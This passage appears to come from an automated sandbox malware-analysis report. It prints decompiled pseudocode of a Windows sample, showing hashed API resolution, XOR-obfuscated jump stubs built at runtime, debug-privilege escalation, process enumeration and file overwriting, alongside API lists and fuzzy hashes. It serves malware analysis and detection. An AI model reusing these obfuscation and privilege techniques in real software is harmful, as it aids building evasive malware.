				while(1) {
					SetFileAttributesW( *(_t24 + 8), 0x80); // executed
					_t14 = CreateFileW( *(_t24 + 8), 0x40000000, 0, 0, 3, 0, 0); // executed
					 *(_t24 - 0xc) = _t14;
					if(_t14 != 0xffffffff) {
						break;
					}
					if( *[fs:0x34] != 0x20) {
						if( *[fs:0x34] != 5) {
							goto L11;
						} else {
							if( *((intOrPtr*)(_t24 - 4)) == 0) {
								E00D07260( *(_t24 + 8));
								 *((intOrPtr*)(_t24 - 4)) =  *((intOrPtr*)(_t24 - 4)) + 1;
								continue;
							}
						}
					} else {
						_t18 = E00D0DDA4( *(_t24 + 8)); // executed
						if(_t18 != 0) {
							continue;
						}
					}
					L14:
					if( *(_t24 - 0xc) != 0xffffffff) {
						 *0xd254d0( *(_t24 - 0xc));
					}
					return  *((intOrPtr*)(_t24 - 8));
				}
				 *((intOrPtr*)(_t24 - 8)) = 1;
				goto L14;
			}






                  0x00d0e321
                  0x00d0e329
                  0x00d0e341
                  0x00d0e347
                  0x00d0e34d
                  0x00000000
                  0x00000000
                  0x00d0e357
                  0x00d0e371
                  0x00000000
                  0x00d0e373
                  0x00d0e377
                  0x00d0e37c
                  0x00d0e381
                  0x00000000
                  0x00d0e388
                  0x00d0e377
                  0x00d0e359
                  0x00d0e35c
                  0x00d0e363
                  0x00000000
                  0x00d0e365
                  0x00d0e363
                  0x00d0e399
                  0x00d0e39d
                  0x00d0e3a2
                  0x00d0e3a2
                  0x00d0e3b3
                  0x00d0e3b3
                  0x00d0e38e
                  0x00000000

                  APIs
                  • SetFileAttributesW.KERNELBASE(00000000,00000080,?,00000000,?,?,?), ref: 00D0E329
                  • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?,?,?), ref: 00D0E341
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$AttributesCreate
                  • String ID:
                  • API String ID: 415043291-0
                  • Opcode ID: 618f57dbe631c36ec7c95d514f09a0bcdc08332c143c0698d6f8abee93890314
                  • Instruction ID: 474cf2fdc86fd3cb294f5e7d78b00338d93f04dce8f105815e23c01f09eb22f3
                  • Opcode Fuzzy Hash: 618f57dbe631c36ec7c95d514f09a0bcdc08332c143c0698d6f8abee93890314
                  • Instruction Fuzzy Hash: 7EE04F30540704FAEB311FA1DD05F6C3F21EB04B62F648A26F699EA0E0C7B0E941DA35
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D0639C Relevance: 1.6, APIs: 1, Instructions: 129memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 95%
                  			E00D0639C() {
				intOrPtr* _t3;
				void* _t6;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t13;
				void* _t14;
				void* _t15;
				void* _t16;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t23;
				void* _t24;
				void* _t28;

				_t3 = E00D05AFC(0xfffffffff80f18e8);
				if(_t3 != 0) {
					_t3 =  *_t3(0x41002, 0, 0, 0, 0, 0); // executed
					_t30 = _t3;
					if(_t3 != 0) {
						_t3 = E00D05AFC(0x6e6047db);
						_t29 = _t3;
						if(_t3 != 0) {
							_t6 = E00D05DB0(_t3, 0xd2540c, E00D05EE8, _t30, _t29); // executed
							_t7 = E00D05DB0(_t6, 0xd254fc, 0xd05fdc, _t30, _t29); // executed
							_t8 = E00D05DB0(_t7, 0xd255ec, E00D060D0, _t30, _t29); // executed
							_t9 = E00D05DB0(_t8, 0xd2568c, 0xd06174, _t30, _t29); // executed
							_t10 = E00D05DB0(_t9, 0xd2569c, 0xd06188, _t30, _t29); // executed
							_t11 = E00D05DB0(_t10, 0xd256d4, 0xd061c4, _t30, _t29); // executed
							_t12 = E00D05DB0(_t11, 0xd25728, 0xd0621c, _t30, _t29); // executed
							_t13 = E00D05DB0(_t12, 0xd2573c, E00D06234, _t30, _t29); // executed
							_t14 = E00D05DB0(_t13, 0xd25764, 0xd06260, _t30, _t29); // executed
							_t15 = E00D05DB0(_t14, 0xd2579c, 0xd0629c, _t30, _t29); // executed
							_t16 = E00D05DB0(_t15, 0xd257b0, 0xd062b4, _t30, _t29); // executed
							_t17 = E00D05DB0(_t16, 0xd257b8, 0xd062c0, _t30, _t29); // executed
							_t18 = E00D05DB0(_t17, 0xd257cc, 0xd062d8, _t30, _t29); // executed
							_t19 = E00D05DB0(_t18, 0xd257f8, 0xd06308, _t30, _t29); // executed
							_t20 = E00D05DB0(_t19, 0xd25810, 0xd06324, _t30, _t29); // executed
							_t21 = E00D05DB0(_t20, 0xd2583c, 0xd06354, _t30, _t29); // executed
							_t22 = E00D05DB0(_t21, 0xd2584c, 0xd06368, _t30, _t29); // executed
							_t23 = E00D05DB0(_t22, 0xd25858, 0xd06378, _t30, _t29); // executed
							_t24 = E00D05DB0(_t23, 0xd2586c, E00D06390, _t30, _t29); // executed
							E00D0B414(_t24, 0);
							return E00D0B41C(E00D17694(_t28, _t30, _t29));
						}
					}
				}
				return _t3;
			}
























                  0x00d063a9
                  0x00d063b0
                  0x00d063c5
                  0x00d063c7
                  0x00d063cb
                  0x00d063dc
                  0x00d063e1
                  0x00d063e5
                  0x00d063f7
                  0x00d06408
                  0x00d06419
                  0x00d0642a
                  0x00d0643b
                  0x00d0644c
                  0x00d0645d
                  0x00d0646e
                  0x00d0647f
                  0x00d06490
                  0x00d064a1
                  0x00d064b2
                  0x00d064c3
                  0x00d064d4
                  0x00d064e5
                  0x00d064f6
                  0x00d06507
                  0x00d06518
                  0x00d06529
                  0x00d06530
                  0x00000000
                  0x00d0653c
                  0x00d063e5
                  0x00d063cb
                  0x00d06543

                  APIs
                  • RtlCreateHeap.NTDLL(00041002,00000000,00000000,00000000,00000000,00000000,B00CA72F,?,?,00D1948F), ref: 00D063C5
                    • Part of subcall function 00D05DB0: RtlAllocateHeap.NTDLL(?,00000000,00000010,00000000,00000000,00000000,00000000,?,?,00D063FC,00D2540C,00D05EE8,00000000,00000000,2663F81C), ref: 00D05DF4
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCreate
                  • String ID:
                  • API String ID: 2875408731-0
                  • Opcode ID: 1485ceaed61ec7e7ff52c4e66c1f492585a62e860af28b805470977240a1a9de
                  • Instruction ID: 8630290be05528f880723c6449a35a71200434d99b2fd18f0d99382106303974
                  • Opcode Fuzzy Hash: 1485ceaed61ec7e7ff52c4e66c1f492585a62e860af28b805470977240a1a9de
                  • Instruction Fuzzy Hash: 6D3133346C6FB1B8D83032A63C0FF9F4C6ECDE2F797850115784C650CE88E0A45889B9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D07C74 Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                  Download Yara Rule
                  APIs
                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000004), ref: 00D07C8F
                    • Part of subcall function 00D06830: RtlAllocateHeap.NTDLL(?,00000008,00000000,?,00D176B5,?,00000000,00000000), ref: 00D06841
                    • Part of subcall function 00D0DBBC: NtTerminateProcess.NTDLL(00D07D88,00000000), ref: 00D0DC1F
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeapManagerOpenProcessTerminate
                  • String ID:
                  • API String ID: 3645570960-0
                  • Opcode ID: e316b7246066bf6a2acc1a5a2f3e963c51400fdb17b590edfb051e289bf2821b
                  • Instruction ID: 087a5aff90a193132c59468ab33fdb2af0e4f6ff861a663296aa534ac9cb2263
                  • Opcode Fuzzy Hash: e316b7246066bf6a2acc1a5a2f3e963c51400fdb17b590edfb051e289bf2821b
                  • Instruction Fuzzy Hash: AD41D331D40209FAEB219B90EC0AFEDBB79EF14712F544065B604BA1E0D7B16A95DB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D05DB0 Relevance: 1.6, APIs: 1, Instructions: 102memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 66%
                  			E00D05DB0(signed int __eax, void* _a4, void* _a8, void* _a12, void* _a16) {
				signed int _t31;
				signed int _t33;
				void* _t34;
				char _t35;
				char _t36;
				signed int _t37;
				void* _t45;

				asm("lodsd");
				_t31 = E00D05C34(__eax ^ 0x4803bfc7); // executed
				if(_t31 != 0) {
					while(1) {
						asm("lodsd");
						if(_t31 == 0xcccccccc) {
							break;
						}
						_t33 = E00D05AFC(_t31 ^ 0x4803bfc7); // executed
						_t37 = _t33;
						_t34 = RtlAllocateHeap(_a12, 0, 0x10);
						asm("stosd");
						 *_t34 = 0xb8;
						_t45 = _t34;
						_t31 = E00D01124(0, 4);
						if(_t31 != 0) {
							if(_t31 != 1) {
								if(_t31 != 2) {
									if(_t31 != 3) {
										if(_t31 != 4) {
											L15:
											continue;
										}
										_push(9);
										_push(1);
										_t35 = E00D01124();
										_t31 = 0x4803bfc7;
										asm("ror ebx, cl");
										 *(_t45 + 1) = _t37 ^ 0x4803bfc7;
										 *((short*)(_t45 + 5)) = 0xc0c1;
										 *((char*)(_t45 + 7)) = _t35;
										 *((char*)(_t45 + 8)) = 0x35;
										 *(_t45 + 9) = 0x4803bfc7;
										 *((short*)(_t45 + 0xd)) = 0xe0ff;
										goto L15;
									}
									_t36 = E00D01124(1, 9);
									_t31 = 0x4803bfc7;
									asm("rol ebx, cl");
									 *(_t45 + 1) = _t37 ^ 0x4803bfc7;
									 *((short*)(_t45 + 5)) = 0xc8c1;
									 *((char*)(_t45 + 7)) = _t36;
									 *((char*)(_t45 + 8)) = 0x35;
									 *(_t45 + 9) = 0x4803bfc7;
									 *((short*)(_t45 + 0xd)) = 0xe0ff;
									goto L15;
								}
								_t31 = 0x4803bfc7;
								 *(_t45 + 1) = _t37 ^ 0x4803bfc7;
								 *((char*)(_t45 + 5)) = 0x35;
								 *(_t45 + 6) = 0x4803bfc7;
								 *((short*)(_t45 + 0xa)) = 0xe0ff;
								goto L15;
							}
							_t31 = E00D01124(1, 9);
							asm("ror ebx, cl");
							 *(_t45 + 1) = _t37;
							 *((short*)(_t45 + 5)) = 0xc0c1;
							 *((char*)(_t45 + 7)) = _t31;
							 *((short*)(_t45 + 8)) = 0xe0ff;
							goto L15;
						}
						_t31 = E00D01124(1, 9);
						asm("rol ebx, cl");
						 *(_t45 + 1) = _t37;
						 *((short*)(_t45 + 5)) = 0xc8c1;
						 *((char*)(_t45 + 7)) = _t31;
						 *((short*)(_t45 + 8)) = 0xe0ff;
						goto L15;
					}
					return _t31;
				}
				return _t31;
			}










                  0x00d05db9
                  0x00d05dc0
                  0x00d05dc7
                  0x00d05dd3
                  0x00d05dd3
                  0x00d05dd9
                  0x00000000
                  0x00000000
                  0x00d05de6
                  0x00d05deb
                  0x00d05df4
                  0x00d05df7
                  0x00d05df8
                  0x00d05dfb
                  0x00d05e01
                  0x00d05e08
                  0x00d05e31
                  0x00d05e5a
                  0x00d05e78
                  0x00d05eac
                  0x00d05edb
                  0x00000000
                  0x00d05edb
                  0x00d05eae
                  0x00d05eb0
                  0x00d05eb2
                  0x00d05eb9
                  0x00d05ec0
                  0x00d05ec2
                  0x00d05ec5
                  0x00d05ecb
                  0x00d05ece
                  0x00d05ed2
                  0x00d05ed5
                  0x00000000
                  0x00d05ed5
                  0x00d05e7e
                  0x00d05e85
                  0x00d05e8c
                  0x00d05e8e
                  0x00d05e91
                  0x00d05e97
                  0x00d05e9a
                  0x00d05e9e
                  0x00d05ea1
                  0x00000000
                  0x00d05ea1
                  0x00d05e5c
                  0x00d05e63
                  0x00d05e66
                  0x00d05e6a
                  0x00d05e6d
                  0x00000000
                  0x00d05e6d
                  0x00d05e37
                  0x00d05e3e
                  0x00d05e40
                  0x00d05e43
                  0x00d05e49
                  0x00d05e4c
                  0x00000000
                  0x00d05e4c
                  0x00d05e0e
                  0x00d05e15
                  0x00d05e17
                  0x00d05e1a
                  0x00d05e20
                  0x00d05e23
                  0x00000000
                  0x00d05e23
                  0x00000000
                  0x00d05dd3
                  0x00d05ee4

                  APIs
                    • Part of subcall function 00D05C34: FindFirstFileW.KERNELBASE(?,?,?,00000004,?), ref: 00D05D07
                    • Part of subcall function 00D05C34: FindClose.KERNELBASE(000000FF,?,00000000), ref: 00D05D2C
                  • RtlAllocateHeap.NTDLL(?,00000000,00000010,00000000,00000000,00000000,00000000,?,?,00D063FC,00D2540C,00D05EE8,00000000,00000000,2663F81C), ref: 00D05DF4
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$AllocateCloseFileFirstHeap
                  • String ID:
                  • API String ID: 1673784098-0
                  • Opcode ID: 958f2f53570a6db92af42431be29969dc89f504488b743a2a58f792ba3110137
                  • Instruction ID: ff8161e93854e625c4fde80a1db2ec754409ac7fc1ca882055620472c08e7da1
                  • Opcode Fuzzy Hash: 958f2f53570a6db92af42431be29969dc89f504488b743a2a58f792ba3110137
                  • Instruction Fuzzy Hash: 7B318D356047469EDB208B28A881756EA95BF11310F18D7A9E98CCF2D3E6A1C490CBB7
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D0908C Relevance: 1.6, APIs: 1, Instructions: 78serviceCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00D0900C: RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,00000000), ref: 00D0902E
                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00D0917F
                    • Part of subcall function 00D0DBBC: NtTerminateProcess.NTDLL(00D07D88,00000000), ref: 00D0DC1F
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AdjustCloseHandlePrivilegeProcessServiceTerminate
                  • String ID:
                  • API String ID: 3176663195-0
                  • Opcode ID: 31a33c6ab5f1bb203ba0ff09000c1de621e6186181d3be92ccdb43a35ed55daa
                  • Instruction ID: 242e63c742b3eb0e54a4e27229d42b9a7d31fd3c12bca163afbb4583ac5bc01e
                  • Opcode Fuzzy Hash: 31a33c6ab5f1bb203ba0ff09000c1de621e6186181d3be92ccdb43a35ed55daa
                  • Instruction Fuzzy Hash: FE31F670940708FBEB209FA0EC4DF9DBBB9EB14716F4440A4E508E62E1D7B18A85DB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D06544 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                  Download Yara Rule
                  C-Code - Quality: 46%
                  			E00D06544(intOrPtr _a4, WCHAR** _a8) {
				WCHAR* _v8;
				WCHAR* _v12;
				void* _t21;
				short* _t22;
				int _t23;
				WCHAR** _t25;
				void* _t27;
				short _t29;
				void* _t30;
				void* _t31;

				_v8 = 0;
				_v12 = 0;
				_v8 = E00D068FC(_a4, 0);
				if(_v8 != 0) {
					_v12 = E00D068FC(_a4, 0);
					if(_v12 != 0) {
						_t27 = 0x1a;
						_t29 = 0x41;
						asm("o16 nop [eax+eax]");
						do {
							_t21 =  *0xd25450(_v12, 0x5c);
							_t31 = _t30 + 8;
							_t22 = _t21 + 2;
							do {
								asm("o16 nop [eax+eax]");
								 *_t22 = _t29;
								asm("o16 nop [eax+eax]");
								_t22 = _t22 + 2;
							} while ( *_t22 != 0);
							_t23 = MoveFileExW(_v8, _v12, 8); // executed
							if(_t23 != 0) {
								goto L9;
							} else {
							}
							goto L10;
							L9:
							 *0xd25444(_v8, _v12);
							_t30 = _t31 + 8;
							_t29 = _t29 + 1;
							_t27 = _t27 - 1;
						} while (_t27 != 0);
					} else {
					}
				} else {
				}
				L10:
				_t25 = _a8;
				 *_t25 = _v8;
				if(_v12 != 0) {
					return E00D0684C(_v12);
				}
				return _t25;
			}













                  0x00d0654e
                  0x00d06551
                  0x00d0655e
                  0x00d06565
                  0x00d06576
                  0x00d0657d
                  0x00d06581
                  0x00d06587
                  0x00d0658c
                  0x00d06596
                  0x00d0659b
                  0x00d065a1
                  0x00d065a6
                  0x00d065a9
                  0x00d065a9
                  0x00d065b3
                  0x00d065b6
                  0x00d065c1
                  0x00d065c7
                  0x00d065d5
                  0x00d065dd
                  0x00000000
                  0x00000000
                  0x00d065df
                  0x00000000
                  0x00d065e1
                  0x00d065e7
                  0x00d065ed
                  0x00d065f0
                  0x00d065f1
                  0x00d065f2
                  0x00000000
                  0x00d0657f
                  0x00000000
                  0x00d06567
                  0x00d065f6
                  0x00d065f6
                  0x00d065fc
                  0x00d06602
                  0x00000000
                  0x00d06607
                  0x00d06611

                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 495a25a2d5e7e2885eda3944f0998d879e00f5d3d1235c01c8cb8840b5765c9e
                  • Instruction ID: a66b68e9eff704752229937c55e94a1891a3830cf1287c99300854030a5b5fcf
                  • Opcode Fuzzy Hash: 495a25a2d5e7e2885eda3944f0998d879e00f5d3d1235c01c8cb8840b5765c9e
                  • Instruction Fuzzy Hash: BA211A71941208EFDB20AFA4DD49BAEBB70FF15305F1440B5E908A62E5E7718EA0DB64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D0F788 Relevance: 1.6, APIs: 1, Instructions: 302COMMON
                  Download Yara Rule
                  APIs
                  • CoInitialize.OLE32(00000000,?,?,?,?,00000000), ref: 00D0F7B7
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Initialize
                  • String ID:
                  • API String ID: 2538663250-0
                  • Opcode ID: 948ae516718792b57ee250978d4013bbb86c142cd3a037540c3e7758ddea37a7
                  • Instruction ID: c882df9bfc292fc06b5eedb3fba3e6a973407b4e1d968687cb3b20b2c6cc8b51
                  • Opcode Fuzzy Hash: 948ae516718792b57ee250978d4013bbb86c142cd3a037540c3e7758ddea37a7
                  • Instruction Fuzzy Hash: F6C16DB0940209EFDB20DF90E849F9ABB78FF11304F2484A5E519EB2A1D775DA45CF64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D09B80 Relevance: 1.5, APIs: 1, Instructions: 46synchronizationCOMMON
                  Download Yara Rule
                  C-Code - Quality: 53%
                  			E00D09B80(void* __ecx, void* __edx) {
				WCHAR* _v8;
				struct _SECURITY_ATTRIBUTES _v20;
				void* _t9;
				intOrPtr _t13;
				void* _t15;

				if( *0xd25129 != 0) {
					_v8 = E00D07F8C();
					 *0xd251a4 =  *0xd2557c(0x100000, 0, _v8);
					if( *0xd251a4 != 0) {
						 *0xd254d0( *0xd251a4);
						if( *0xd2512e != 0) {
							E00D10410(__ecx, __edx, 0, 0, 0,  *0xd2512e & 0x000000ff);
						}
						 *0xd255c8(0);
					}
					if(E00D01574() < 0x3c) {
						_t13 = 0xd09b30;
					} else {
						_t13 = 0xd09ad0;
					}
					_v20.nLength = 0xc;
					_v20.lpSecurityDescriptor = _t13;
					_v20.bInheritHandle = 0;
					_t15 = CreateMutexW( &_v20, 1, _v8); // executed
					 *0xd251a4 = _t15;
					return E00D068B4(_v8);
				}
				return _t9;
			}








                  0x00d09b8d
                  0x00d09b98
                  0x00d09bab
                  0x00d09bb7
                  0x00d09bbf
                  0x00d09bcc
                  0x00d09bdc
                  0x00d09bdc
                  0x00d09be3
                  0x00d09be3
                  0x00d09bf1
                  0x00d09bfb
                  0x00d09bf3
                  0x00d09bf3
                  0x00d09bf3
                  0x00d09c01
                  0x00d09c08
                  0x00d09c0b
                  0x00d09c1b
                  0x00d09c21
                  0x00000000
                  0x00d09c29
                  0x00d09c31

                  APIs
                  • CreateMutexW.KERNELBASE(0000000C,00000001,00000000), ref: 00D09C1B
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateMutex
                  • String ID:
                  • API String ID: 1964310414-0
                  • Opcode ID: 9344744fe7ef6c580bd2f17059a31d85b97bf5e9ab93c0804dcb05969073e4a8
                  • Instruction ID: f178cfb7933a37aaa3056048cfa9f3ec6feef6b5152f7fa33a51f06bce258bed
                  • Opcode Fuzzy Hash: 9344744fe7ef6c580bd2f17059a31d85b97bf5e9ab93c0804dcb05969073e4a8
                  • Instruction Fuzzy Hash: 1D117C74804704AEEB22DBA0FC5AFA8BBB5EB04301F140191F908DA2E9D7B11551DB75
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D0900C Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                  Download Yara Rule
                  C-Code - Quality: 20%
                  			E00D0900C() {
				char _v8;
				char _v12;
				char _v13;
				char _t16;

				_v8 = 0;
				_v12 = 0;
				_v13 = 0;
				RtlAdjustPrivilege(0x14, 1, 0,  &_v13); // executed
				_t16 = E00D097A8(0xffffffffc1fa6a5a); // executed
				if(_t16 != 0) {
					_v12 = E00D09850(_t16, 2, 2);
					if(_v12 != 0) {
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						if( *0xd25498() == 0) {
							_v8 = 1;
						}
					}
				}
				if(_v12 != 0) {
					 *0xd254d0(_v12);
				}
				return _v8;
			}







                  0x00d09012
                  0x00d09019
                  0x00d09020
                  0x00d0902e
                  0x00d0903f
                  0x00d09046
                  0x00d09052
                  0x00d09059
                  0x00d0905b
                  0x00d09060
                  0x00d09061
                  0x00d09063
                  0x00d0906d
                  0x00d0906f
                  0x00d0906f
                  0x00d0906d
                  0x00d09059
                  0x00d0907a
                  0x00d0907f
                  0x00d0907f
                  0x00d0908b

                  APIs
                  • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,00000000), ref: 00D0902E
                    • Part of subcall function 00D097A8: NtQuerySystemInformation.NTDLL(00000005,?,00000400,00000400,00000400), ref: 00D097D5
                    • Part of subcall function 00D09850: NtClose.NTDLL(00000000), ref: 00D09941
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AdjustCloseInformationPrivilegeQuerySystem
                  • String ID:
                  • API String ID: 327775174-0
                  • Opcode ID: 3f260368b34eb68793d52bfdb0a198224687905cb1d9721c24e767f1ef4d5fc0
                  • Instruction ID: 62b3108d49535e7606a5c19d5b6131b8e5a2eba49093c258456594c8f12447a2
                  • Opcode Fuzzy Hash: 3f260368b34eb68793d52bfdb0a198224687905cb1d9721c24e767f1ef4d5fc0
